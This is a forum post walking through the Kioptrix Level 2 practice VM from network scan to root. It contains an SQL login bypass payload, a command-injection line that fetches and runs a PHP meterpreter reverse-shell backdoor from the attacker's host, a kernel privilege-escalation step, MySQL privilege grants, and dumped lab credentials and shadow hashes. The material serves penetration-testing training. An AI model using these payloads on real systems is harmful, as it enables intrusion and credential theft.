[Video] Kioptrix - Level 2 (Injection)

[g0tmi1k]

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/4760142/
Download video: http://www.mediafire.com/?f3hbmtdt44t44v3

Brief Overview
Time for level 2! =) [See here for level 1]. Like before, kioptrix is another “Vulnerable-By-Design OS” (De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any means possible.

This video demonstrates how code being injected into a web page results in the machine becoming compromised. The attacker afterwards then starts exploring the system for further pieces of information.

Method
* Scan network for hosts (Nmap)
* Bypass login screen (MySQL Injection)
* Local command execution (PHP Injection)
* Upload a backdoor (PHP Meterpreter)
* Gain root access (ip_append_data() local ring0 root exploit)
* Game Over
* Enable access to MySQL database (MySQL Injection)
* Gather information (history and user credentials)

What do I need?
* Kioptrix - Level 2 VM. Download here (Mirror: Part 1 MD5:CF25057866E4BEA4F05651ACC222E3AE, Part 2 MD5:1ADCE0A6AFE4EE2FADD82F9EE3878AED, Part 3 MD5:A8012648FAB73746CE4E3250E0D66291)
* VMware player OR workstation. Download here
* Nmap – (Can be found on BackTrack 4-R2). Download here
* Metasploit – (Can be found on BackTrack 4-R2)
* Internet Browser – (Firefox can be found on BackTrack 4-R2)
* A Text Editor – (Kate can be found on BackTrack 4-R2)
* ip_append_data() ring0 Root Exploit – (Can be found on exploit-db.com)
* MySQL – (Can be found on BackTrack 4-R2)

Walk through *Due to the forums security, I'm unable to post the complete walk through*
After starting the network services and obtaining an IP address (192.168.0.33), the attacker does a quick nmap scan to show what host are currently "alive" on the network. After a target IP is known the attacker proceeds to do a more detailed scan on the target (192.168.0.202). By doing this, nmap shows what possible services (ports) the target has running and the version of the service and then attempts to identify the operating system (OS). The result of this shows:
* OS: Linux v2.6.x (2.6.9-30)
* Port 80 - Web Server: Apache httpd 2.0.52 (CentOS)

The attacker navigates to the web server and is presented with a login page. The attacker chooses to enter a 'standard administrator's user name'("admin") as the user name and instead of entering a valid password uses some “MySQL injection code”. This "password" will cause the original MySQL statement returning true, therefore it will login as the chosen user without the correct password being present. The vulnerable code is as follows:
* Original command
$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
* Expected input (user: admin, Password: 5afac8d85f):
$query = "SELECT * FROM users WHERE username = 'admin' AND password='5afac8d85f'";
* "Injected" input (user: admin, Password: ' OR 1=1 -- -):
$query = "SELECT * FROM users WHERE username = 'admin' AND password='' OR 1=1 -- -'";

This works because the attacker has asked to login as "admin" and because the MySQL command is looking either for: "password" OR "1=1" to match. Because 1 will ALWAYS be 1, the statement will return true, therefore allowing the attacker to login as admin. The code at the end " -- -", comments out the rest of the query which means that the rest of the query is ignored so the attacker does not have to worry about fixing the syntax.

The attacker is then looking at the admin panel, which allows the admin to "ping" other computers attached to the network from the server location. The attacker notices that the web pages has a "php" file extension and guesses that the server supports PHP and wonders if meterpreter agent would be able to execute. The attacker creates a "php meterpreter backdoor file" and sets up a metasploit to interact with the backdoor. The attacker starts a web server which is used to host the backdoor.

The attacker now needs to transfer the backdoor onto the server allowing them to be able to gain a remote access on the system. As mentioned before the admin panel allows admins to "ping". The attacker then tries to inject in the php file to run other commands instead. The vulnerable code is as follows:
* Original command
echo shll_exec( 'ping -c 3 ' . $target );
* Expected input (ip: 192.168.0.1):
echo shll_exec( 'ping -c 3 ' . 192.168.0.1 );
* "Injected" input (ip: ; ** /*** && **** -O bd.php 192.168.0.33/backdoor.php.txt && php -f bd.php):
echo shll_exec( 'ping -c 3 ' . ; ** /*** && **** -O bd.php 192.168.0.33/backdoor.php.txt && php -f bd.php );

The coded uses “shll_exec” allows to: "Execute command via shell and return the complete output as a string". The ping command is hard-coded in at the start, however because the ping command requires an IP address to be successfully executed it fails to receive therefore it also fails to execute. Instead the attacker has used ";" which allows for commands to be executed sequentially regardless of outcome (e.g. multiple commands on the same line), which means the PHP code continues to run the attackers command even though “ping” failed. The attacker has "asked" to:
* Change directory to "/***" as this is writeable for the exploited user "apache".
* Download the content of a web page (which is the backdoor), rename it to a shorter filename and change the file extension.
* Then execute the code.

The attacker checks that a session has been created in metasploit and interacts with it. The result being that the attacker now has a remote shell on the target system.

However the exploited service (PHP) is using a user that has limited access to the system and the attacker would like more (plus the objective of kioptrix is to gain access to the superuser, "root"). The attacker makes a note of the targets system's kernel version and searches for an exploit that could lead to "privilege escalation" which would allow for “deeper access” into the system. After searching for known exploits the attacker identifies an exploit that is compatible with the target's system. The attacker downloads a copy of the exploit and transfers it using the same method as the backdoor previously. After successfully compiling the exploit, the attacker runs the exploit on the target's success which results in the attacker being promoted to the "root" account. The attacker then creates a copy of the backdoor file in the "document root". The attacker then kills the remote shell. (Note: The end goal of kioptrix has been reached and everything after copying the backdoor is optional).

As the login page requires login details, which need to be stored somewhere the attacker decides to locate these pieces of information. The attacker starts by viewing the source code of the login page for clues as these details could be; hard-coded into the source, use another file to handle this function or use a database.

Once the attacker identities that the login page uses a MySQL database which contains the login details, the attacker wants to discover what else is stored in the database. As the login page relies on the database, the login page will contain a username and password in which to access it. The attacker uses a copy the login details plus as the attacker can executed commands, they use this to their advantage by command line interaction with MySQL database.

The attacker starts off viewing all the databases which are stored in MySQL, and spots the table "MySQL" which might contain some 'interesting' details! The attacker moves on to seeing what tables are in the database, which brings up a table called "users". After selecting everything in the table the attacker spots that the "root" user has the same hash (hence same password) as the user "john" (which they are currently using).

The attacker can keep using the current system to interact with the database; however allowing direct command line access from their machine would be 'easier'. So the attacker goes about reconfiguring MySQL to allow this. Currently the only allowed access is from the local machine itself(localhost/127.0.0.1), therefore no external communication is allowed (as seen by the "nmap" & "MySQL"). However as the attacker can execute commands locally it "grants all privileges" to the user "root" on the attackers IP (which still protects access from everyone else!).

[g0tmi1k]

After connecting via command line, the attacker sets about finding the real password for the admin panel instead of injecting to gain access. The attacker knows which database is used (via the source code of the login page), and browses the contents of the tables. The attacker finds 2 valid logins and tries them out. The first time, shows what happens if the login details are incorrect, the next login is from a "non admin" but a valid account, and the last login is the valid admin account. When the attacker was injecting it the admin account was not specified, the database would login as the first user, in which in most cases it is the admin account as it is usually the first user that is created.

The attacker can use MySQL to view files however just like before when using PHP injection because the exploited user is a limited account, it has limited access to the system however it is a different user from before, as it now is "mysql" rather than “apache”.

The attacker tests the backdoor in order to get a remote shell again. However it is easier this time as they do not have to go though the hassle of injecting again. The attacker can just execute the php backdoor, this time done by visiting it directly on the web server, which results in the php code being executed.

After gaining access and exploiting the system gain root access, the attacker scans the system for ".mysql_history", which is a file that contains previous entered commands and views the contents when using the "root" account.

Commands *Due to the forums security, I'm unable to post the complete command list.*

Code:

start-network 
dhclient eth0 
clear 

nmap 192.168.0.0/24 -n -sn -sP  
nmap 192.168.0.202 -p 1-65500 -O -sS -sV -v 

firefox http://192.168.0.202 
-> User: admin 
-> Password: ' OR 1=1 -- - 

clear 
msfpayload | grep PHP 
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.0.33 LPORT=8080 R > /var/www/backdoor.php.txt 
start-apache 
msfconsole 
use multi/handler 
search php 
set PAYLOAD php/meterpreter/reverse_tcp 
show options 
set LHOST 0.0.0.0 
set LPORT 8080 
show options 
exploit -j -z  
* kate -> /var/www/backdoor.php.txt. Remove "#". Save. 
; ** /*** && **** -O bd.php 192.168.0.33/backdoor.php.txt && php -f bd.php 
sessions -l -v  
sessions -i 1 
sysinfo 
shell 
uname -a; cat /etc/*-release; id; w 

Firefox: Search (exploit.db): Linux Kernel 2.6 -> Download #http://www.exploit-db.com/exploits/9542/ 
cp 9542.c /var/www/escpriv.c 
* cd /tmp
* wget 192.168.0.33/escpriv.c 
* gcc escpriv.c -o rootMe 
* id 
* ./rootMe 
* id 
* whoami && cat /etc/issue 

* cp bd.php /var/www/html/backdoor.php    # root only on folder! 
^C 
y   #n = interact 0 && background 

firefox http://192.168.0.202 
; cat index.php 
-> Right click -> View Source. 
--> User: john 
--> Passowrd: hiroshima 
--> Database: webapp 
; mysql -u john -phiroshima -e "SHOW databases;" 
; mysql -u john -phiroshima -e "USE mysql; SHOW tables;" 
; mysql -u john -phiroshima -e "USE mysql; SELECT * FROM user;" 
mysql -h 192.168.0.202 -u root 
nmap 192.168.0.202 -sV -p 3306 
; mysql -u root -phiroshima -e "USE mysql; GRANT ALL PRIVILEGES ON *.*  TO 'root'@'192.168.0.33';"   #-D mysql #IDENTIFIED BY 'g0tmi1k';" 
nmap 192.168.0.202 -sV -p 3306 
mysql -h 192.168.0.202 -u root 
SHOW databases; 
USE webapp; SHOW tables; 
SELECT * FROM users; 
#* firefox http://192.168.0.202/ 
#-->Login *fail*, john, admin 
SELECT load_file('/etc/passwd'); 
exit 

firefox http://192.168.0.202/backdoor.php 
sessions -i 2 
shell 
*UNABLE TO POST THIS LINE OF CODE. SEE BLOG POST*
* ** /***; ./rootMe 
* cat /root/.mysql_history 
* cat /etc/shadow 

* whoami && cat /etc/issue 


#---------------------------------------------------------------------  
MySQL->history: root:Ha56!blaKAbl [???] 
MySQL->users:   root:hiroshima    [hash: 5a6914ba69e02807] 
MySQL->users:   john:hiroshima    [hash: 5a6914ba69e02807] 
MySQL->WebApp:  admin:5afac8d85f  [Type: Admin] 
MySQL->WebApp;  john:66lajGGbla   [Type: Non-admin] 
Shadow:         root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7::: 
Shadow:         john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7::: 
Shadow:         harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7::: 
#---------------------------------------------------------------------

Notes
* When meterpreter is being hosted on the attacker's system, the file extension is “.txt”, therefore it does not get executed like a php file would when called from wget on the targets system.
* The “document root” folder is only writeable by “root”.
* The attacker did not have to kill the remote shell and could have been executed in it, however this method demonstrates if the backdoor failed to work or if the attacker did not wish to use one for whatever
reason)
* When connecting to MySQL remotely, a password is not required because when executing the "GRANT ALL PRIVILEGES" statement it did not include "IDENTIFIED BY 'g0tmi1k'" after the IP address. This would set the password to "g0tmi1k".

Song: Phynn Presents Binary Star - The Halo Effect (Original Mix) & TyDi Feat. Tania Zygar - Vanilla (Ben Gold Remix) & Afrojack Feat. Eva Simons - Take Over Control (Radio Edit) & Pakito - Philosophy
Video length: 10:31
Capture length: 22:32
Blog Post: http://g0tmi1k.blogspot.com/2011/02/video-kioptrix-level-2-injection.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/38313-%5Bvideo%5D-kioptrix-level-2-injection.html#post190749